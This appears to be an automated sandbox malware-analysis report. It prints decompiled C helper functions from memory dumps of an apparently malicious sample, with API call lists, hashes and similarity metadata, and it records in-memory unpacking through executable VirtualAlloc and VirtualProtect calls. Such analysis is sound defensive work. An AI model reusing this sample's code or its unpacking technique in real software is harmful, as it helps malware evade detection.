                                                                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                                                                    			E00A76027(void** __esi) {
                                                                                                                                                                                                                                                                                    				char* _v0;
                                                                                                                                                                                                                                                                                    				intOrPtr _t4;
                                                                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                                                                    				void* _t8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t11;
                                                                                                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                                                                                                    				void** _t14;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t14 = __esi;
                                                                                                                                                                                                                                                                                    				_t4 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t6 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t8 =  *_t14;
                                                                                                                                                                                                                                                                                    				if(_t8 != 0 && _t8 != 0xa7a030) {
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, 0, _t8);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t14[1] = E00A749BA(_v0, _t14);
                                                                                                                                                                                                                                                                                    				_t11 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    				_t12 = _t11 + 0x40;
                                                                                                                                                                                                                                                                                    				__imp__(_t12);
                                                                                                                                                                                                                                                                                    				return _t12;
                                                                                                                                                                                                                                                                                    			}











                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A76030
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A7603A
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A76062
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A7607E
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 1cdf0ecd4ecf8eef5ed8a2f929eac4180fd397c587c01f6acecd06901c004b26
                                                                                                                                                                                                                                                                                    • Instruction ID: 621efacaf9d57f14d423a52d604c74de719e50aca29110d315d8cd5c714d1fb9
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1cdf0ecd4ecf8eef5ed8a2f929eac4180fd397c587c01f6acecd06901c004b26
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1F0FE74210640EBD720DFB9DC88F1A77A8AB69741B04C416F94DD6261C630EC87CB26
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A71547() {
                                                                                                                                                                                                                                                                                    				void* _t1;
                                                                                                                                                                                                                                                                                    				intOrPtr _t5;
                                                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                                                    				void* _t7;
                                                                                                                                                                                                                                                                                    				void* _t11;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t1 =  *0xa7a2c4; // 0x2d0
                                                                                                                                                                                                                                                                                    				if(_t1 == 0) {
                                                                                                                                                                                                                                                                                    					L8:
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				SetEvent(_t1);
                                                                                                                                                                                                                                                                                    				_t11 = 0x7fffffff;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					SleepEx(0x64, 1);
                                                                                                                                                                                                                                                                                    					_t5 =  *0xa7a304; // 0x0
                                                                                                                                                                                                                                                                                    					if(_t5 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t11 = _t11 - 0x64;
                                                                                                                                                                                                                                                                                    					if(_t11 > 0) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t6 =  *0xa7a2c4; // 0x2d0
                                                                                                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t7 =  *0xa7a290; // 0x5170000
                                                                                                                                                                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                                                                                                                                                                    					HeapDestroy(_t7);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                                                                    			}








                                                                                                                                                                                                                                                                                    0x00a71588
                                                                                                                                                                                                                                                                                    0x00a7158f
                                                                                                                                                                                                                                                                                    0x00a71592
                                                                                                                                                                                                                                                                                    0x00a71592
                                                                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(000002D0,00000001,00A74214), ref: 00A71552
                                                                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 00A71561
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000002D0), ref: 00A71582
                                                                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(05170000), ref: 00A71592
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                                                                    • Opcode ID: e8224bacc3bce8b77390dd165a35d513106620256a07852976a2fc776b65e9d1
                                                                                                                                                                                                                                                                                    • Instruction ID: 8f4aa45ae804f9335a0db5a312991821650742e2b0ccdd7f4897abb131d6cd8a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8224bacc3bce8b77390dd165a35d513106620256a07852976a2fc776b65e9d1
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0F0A071B40301ABE720DBB8AD0DB4F37FCABA4712B00C110B81ED31A0DB24C9828591
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                    			E00A7461D() {
                                                                                                                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                                                                                                                    				void** _t3;
                                                                                                                                                                                                                                                                                    				void** _t5;
                                                                                                                                                                                                                                                                                    				void** _t7;
                                                                                                                                                                                                                                                                                    				void** _t8;
                                                                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t3 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    				__imp__( &(_t3[0x10]));
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t5 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    					_t1 =  &(_t5[0x16]); // 0x0
                                                                                                                                                                                                                                                                                    					if( *_t1 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					Sleep(0xa);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t7 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    				_t10 =  *_t7;
                                                                                                                                                                                                                                                                                    				if(_t10 != 0 && _t10 != 0xa7b882) {
                                                                                                                                                                                                                                                                                    					HeapFree( *0xa7a290, 0, _t10);
                                                                                                                                                                                                                                                                                    					_t7 =  *0xa7a37c; // 0x5569630
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *_t7 = _v0;
                                                                                                                                                                                                                                                                                    				_t8 =  &(_t7[0x10]);
                                                                                                                                                                                                                                                                                    				__imp__(_t8);
                                                                                                                                                                                                                                                                                    				return _t8;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(055695F0), ref: 00A74626
                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A74630
                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,00A72F44,?,?,?,?,?,00A744F9,?,00000001), ref: 00A7465E
                                                                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(055695F0), ref: 00A74673
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 79e5d45bca0468b95990198be123e0417328ad76c81960e6842b6d0c8378a650
                                                                                                                                                                                                                                                                                    • Instruction ID: 0c7094e7de0e7812e94bf4346fd9138a850dece9909ed61283e00378c6b00d95
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e5d45bca0468b95990198be123e0417328ad76c81960e6842b6d0c8378a650
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCF09E78610240EFE718CFA4EC99F1A77A5AB9D751B05C15AE90EDB370D730AC82CA16
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                                                                    			E00A72FFC(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                                                                    				intOrPtr* _v8;
                                                                                                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t22;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				char* _t30;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				void* _t37;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				int _t42;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t17 = __eax;
                                                                                                                                                                                                                                                                                    				_t37 = 0;
                                                                                                                                                                                                                                                                                    				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                                                                                                                                                                                                                                                                    				_t2 = _t17 + 1; // 0x1
                                                                                                                                                                                                                                                                                    				_t28 = _t2;
                                                                                                                                                                                                                                                                                    				_t34 = E00A75C4E(_t2);
                                                                                                                                                                                                                                                                                    				if(_t34 != 0) {
                                                                                                                                                                                                                                                                                    					_t30 = E00A75C4E(_t28);
                                                                                                                                                                                                                                                                                    					if(_t30 == 0) {
                                                                                                                                                                                                                                                                                    						E00A72A03(_t34);
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						_t39 = _a4;
                                                                                                                                                                                                                                                                                    						_t22 = E00A779AC(_t39);
                                                                                                                                                                                                                                                                                    						_v8 = _t22;
                                                                                                                                                                                                                                                                                    						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                                                                                                                                                                                                                                                                    							_a4 = _t39;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t26 = _t22 + 2;
                                                                                                                                                                                                                                                                                    							_a4 = _t22 + 2;
                                                                                                                                                                                                                                                                                    							_t22 = E00A779AC(_t26);
                                                                                                                                                                                                                                                                                    							_v8 = _t22;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_t22 == 0) {
                                                                                                                                                                                                                                                                                    							__imp__(_t34, _a4);
                                                                                                                                                                                                                                                                                    							 *_t30 = 0x2f;
                                                                                                                                                                                                                                                                                    							 *((char*)(_t30 + 1)) = 0;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t42 = _t22 - _a4;
                                                                                                                                                                                                                                                                                    							memcpy(_t34, _a4, _t42);
                                                                                                                                                                                                                                                                                    							 *((char*)(_t34 + _t42)) = 0;
                                                                                                                                                                                                                                                                                    							__imp__(_t30, _v8);
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						 *_a8 = _t34;
                                                                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                                                                    						 *_a12 = _t30;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82,?,05569698), ref: 00A73008
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A779AC: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00A73036,00000000,00000001,00000001,?,?,00A756E5,00000000,00000000,00000000,05569698), ref: 00A779BA
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A779AC: StrChrA.SHLWAPI(?,0000003F,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82,?,05569698,0000EA60,?), ref: 00A779C4
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00A756E5,00000000,00000000,00000000,05569698,?,?,00A73B82), ref: 00A73066
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00A73076
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00A73082
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 513e993e3ce27bed7e5f7330c38b5e574b5a9d5efef44ad86f6322c89c79f677
                                                                                                                                                                                                                                                                                    • Instruction ID: e566959ab589bc4cf5554cd97b71c9a889f5ea334d5f9ffbea5058e371bf14ba
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 513e993e3ce27bed7e5f7330c38b5e574b5a9d5efef44ad86f6322c89c79f677
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45218C72505255AFCF229FA4CC44AABBFB8AF06380B06C065F90D9B212D771CA42D7A1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00A74DC8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                                                    				int _t25;
                                                                                                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t29 = lstrlenW(_a4);
                                                                                                                                                                                                                                                                                    				_t25 = lstrlenW(_a8);
                                                                                                                                                                                                                                                                                    				_t18 = E00A75C4E(_t25 + _t29 + _t25 + _t29 + 2);
                                                                                                                                                                                                                                                                                    				_v8 = _t18;
                                                                                                                                                                                                                                                                                    				if(_t18 != 0) {
                                                                                                                                                                                                                                                                                    					_t34 = _t29 + _t29;
                                                                                                                                                                                                                                                                                    					memcpy(_t18, _a4, _t34);
                                                                                                                                                                                                                                                                                    					_t10 = _t25 + 2; // 0x2
                                                                                                                                                                                                                                                                                    					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                                                                    			}









                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,73B75520,?,00000008,0556932C,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DD8
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(00A74ABB,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DDF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00A74ABB,004F0053,0556932C,?,?,?,?,?,?,00A71BD5), ref: 00A74DFF
                                                                                                                                                                                                                                                                                    • memcpy.NTDLL(73B769A0,00A74ABB,00000002,00000000,004F0053,73B769A0,?,?,00A74ABB,004F0053,0556932C), ref: 00A74E12
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                                                                    • Opcode ID: bd023334093d90d3a13d434ccc372080040bddf542085eed90d1d305424ac98a
                                                                                                                                                                                                                                                                                    • Instruction ID: 1a09e903901f364ed0cc928716432f580b80eb07fa18cce35596cb37c5b3370c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd023334093d90d3a13d434ccc372080040bddf542085eed90d1d305424ac98a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CDF03732900118BB8B11EFA8CD85D9ABBACEE083547018062F908D7202E771EA148BA0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(0556887A,00000000,00000000,00000000,00A76328,00000000), ref: 00A72839
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 00A72841
                                                                                                                                                                                                                                                                                      • Part of subcall function 00A75C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00A73FAA), ref: 00A75C5A
                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,0556887A), ref: 00A72855
                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 00A72860
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1180379549.0000000000A71000.00000020.00020000.sdmp, Offset: 00A70000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180355733.0000000000A70000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180418644.0000000000A79000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180445094.0000000000A7A000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1180468302.0000000000A7C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 80d552652c23b147ebc562d1cb060d8d8135ccd64bdee2133f705a14d687225d
                                                                                                                                                                                                                                                                                    • Instruction ID: 1347bd3a6f2a46d58b4dd5219cc18d5ddd514c4ced8cd97fa6c0f91474914de8
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80d552652c23b147ebc562d1cb060d8d8135ccd64bdee2133f705a14d687225d
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE092339016206787119FE59C48C9FBBBCEF99751704842BFA08D3120C72488478BA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1183886378.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Virtual$Protect$Alloc$Free
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2574235972-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E097670,00000001,00000040), ref: 6E064885
                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00007F01), ref: 6E0648E8
                                                                                                                                                                                                                                                                                    • FindFirstChangeNotificationW.KERNELBASE(6E09767C,00000001,00000008), ref: 6E064A56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1183797753.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ChangeFindFirstNotification$IconLoad
                                                                                                                                                                                                                                                                                    • String ID: n$8n$8n$8n$Hn$Xn$Xn
                                                                                                                                                                                                                                                                                    • API String ID: 2944710551-1746711009
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(?,6E09E304,6E09E30C,6E5AD60C), ref: 6E065BA0
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1183797753.000000006E05E000.00000020.00020000.sdmp, Offset: 6E05E000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                    • String ID: *
                                                                                                                                                                                                                                                                                    • API String ID: 544645111-163128923
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000814,00003000,00000040,00000814,6E09F360), ref: 6E09F9C3
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,000002B1,00003000,00000040,6E09F3BF), ref: 6E09F9FA
                                                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,0000ED87,00003000,00000040), ref: 6E09FA5A
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FA90
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00000000,00000004,6E09F8E5), ref: 6E09FB95
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(6E050000,00001000,00000004,6E09F8E5), ref: 6E09FBBC
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5), ref: 6E09FC89
                                                                                                                                                                                                                                                                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E09F8E5,?), ref: 6E09FCDF
                                                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E09FCFB
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.1183246772.000000006E09F000.00000040.00020000.sdmp, Offset: 6E09F000, based on PE: false
                                                                                                                                                                                                                                                                                    Similarity
